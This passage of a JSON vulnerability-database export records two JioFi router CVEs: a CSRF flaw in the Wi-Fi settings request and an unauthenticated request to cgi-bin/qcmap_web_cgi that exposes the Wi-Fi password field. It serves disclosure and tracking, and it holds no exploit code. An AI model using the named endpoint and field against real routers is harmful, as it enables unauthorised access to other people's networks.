"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7440",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7440",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-797",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158875",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158875"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi). JioFi 4G M2S The device contains a cross-site request forgery vulnerability.Information may be tampered with. A remote attacker could use the SSID name and Security Key fields to exploit this vulnerability to perform operations with administrative privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "VULHUB",
"id": "VHN-158875"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-158875",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158875"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "152361",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2019-7440",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "46633",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-797",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158875",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158875"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
]
},
"id": "VAR-201903-0480",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158875"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:36:18.510000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "JioFi M2",
"trust": 0.8,
"url": "https://www.jio.com/shop/en-in/jiofi-m2/p/491193575"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158875"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "NVD",
"id": "CVE-2019-7440"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/152361/jiofi-4g-m2s-1.0.2-cross-site-request-forgery.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/46633/"
},
{
"trust": 1.7,
"url": "https://gkaim.com/cve-2019-7440-vikas-chaudhary/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7440"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7440"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46633"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158875"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158875"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158875"
},
{
"date": "2019-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"date": "2019-03-21T16:01:13.907000",
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"date": "2019-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158875"
},
{
"date": "2019-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002846"
},
{
"date": "2019-04-02T17:29:01.013000",
"db": "NVD",
"id": "CVE-2019-7440"
},
{
"date": "2019-04-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4G M2S Device cross-site request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002846"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-797"
}
],
"trust": 0.6
}
}
VAR-201905-0420
Vulnerability from variot - Updated: 2023-12-18 12:18JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-bin/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field. JioFi 4 jmr1140 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Reliance Jio Infocomm JioFi 4 jmr1140 is a portable wireless router device from Reliance Jio Infocomm in Australia. There is a trust management issue vulnerability in Reliance Jio Infocomm JioFi 4 jmr1140 Amtel_JMR1140_R12.07 version. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0420",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jmr1140",
"scope": "eq",
"trust": 1.0,
"vendor": "jio",
"version": "amtel_jmr1140_r12.07"
},
{
"model": "jiofi jmr1140",
"scope": "eq",
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": "amtel_jmr1140_r12.07"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "NVD",
"id": "CVE-2019-7745"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:jmr1140_firmware:amtel_jmr1140_r12.07:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:jmr1140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7745"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ronnie T Baby",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7745",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7745",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-159180",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7745",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7745",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-620",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-159180",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7745",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159180"
},
{
"db": "VULMON",
"id": "CVE-2019-7745"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-bin/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field. JioFi 4 jmr1140 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Reliance Jio Infocomm JioFi 4 jmr1140 is a portable wireless router device from Reliance Jio Infocomm in Australia. There is a trust management issue vulnerability in Reliance Jio Infocomm JioFi 4 jmr1140 Amtel_JMR1140_R12.07 version. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "VULHUB",
"id": "VHN-159180"
},
{
"db": "VULMON",
"id": "CVE-2019-7745"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7745",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "151655",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "46364",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-620",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-159180",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7745",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159180"
},
{
"db": "VULMON",
"id": "CVE-2019-7745"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
]
},
"id": "VAR-201905-0420",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-159180"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:18:03.807000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.jio.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159180"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "NVD",
"id": "CVE-2019-7745"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/151655/jiofi-4-jmr-1140-wifi-password-cross-site-request-forgery.html"
},
{
"trust": 1.8,
"url": "https://jiosecuritybugs.blogspot.com/2019/02/cve-2019-7745-jiofi-4-jmr1140.html"
},
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/46364/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7745"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7745"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46364"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159180"
},
{
"db": "VULMON",
"id": "CVE-2019-7745"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-159180"
},
{
"db": "VULMON",
"id": "CVE-2019-7745"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-07T00:00:00",
"db": "VULHUB",
"id": "VHN-159180"
},
{
"date": "2019-05-07T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7745"
},
{
"date": "2019-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"date": "2019-05-07T19:29:02.037000",
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"date": "2019-02-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-159180"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7745"
},
{
"date": "2019-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004436"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-7745"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4 jmr1140 Vulnerabilities related to certificate and password management in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004436"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-620"
}
],
"trust": 0.6
}
}